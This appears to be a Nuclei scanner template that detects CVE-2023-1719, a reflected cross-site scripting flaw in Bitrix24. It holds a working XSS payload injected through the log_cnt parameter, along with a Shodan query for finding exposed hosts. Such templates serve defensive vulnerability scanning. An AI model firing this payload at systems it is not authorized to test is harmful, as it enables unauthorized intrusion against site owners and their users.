id: CVE-2023-1719

info:
  name: Bitrix Component - Cross-Site Scripting
  author: DhiyaneshDk
  severity: critical
  description: |
    Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.
  reference:
    - https://starlabs.sg/advisories/23/23-1719/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1719
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1719
    cwe-id: CWE-665
    epss-score: 0.02807
    epss-percentile: 0.89587
    cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bitrix24
    product: bitrix24
    shodan-query: html:"/bitrix/"
  tags: cve2023,cve,bitrix,xss,bitrix24

http:
  - method: GET
    path:
      - "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'LOG_CNT':"
          - "<img onerror=alert(document.domain) src=1>"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022018dcc8bec6d27c60fd722a56d8310ee01380c42efde6680eba35b5dfca48aae2022100e10f49c69f6c593d4b4f33a6945c7f89ec821577f7842e716a4bceebf216cc8b:922c64590222798bb761d5b6d8e72950